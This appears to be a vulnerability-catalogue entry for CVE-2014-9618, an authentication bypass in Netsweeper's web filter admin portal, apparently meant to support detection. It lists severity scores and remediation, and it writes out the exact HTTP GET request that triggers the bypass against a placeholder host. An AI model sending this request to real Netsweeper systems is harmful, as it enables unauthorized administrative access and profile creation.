🔙 목록으로 돌아가기

CVE-2014-9618: Netsweeper - Authentication Bypass

TitleNetsweeper - Authentication Bypass
Authordaffainfo
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.
RemediationApply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Netsweeper.
CVSS Score9.8
EPSS Score0.68171
CVE IDCVE-2014-9618
CWE IDCWE-287
Tags cve2014 cve netsweeper auth-bypass packetstorm edb xss vuln

🔍 Vulnerability Description

The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.

🌐 HTTP Request

GET /webadmin/clientlogin/?srid&action=showdeny&url HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-9618.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-9618.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A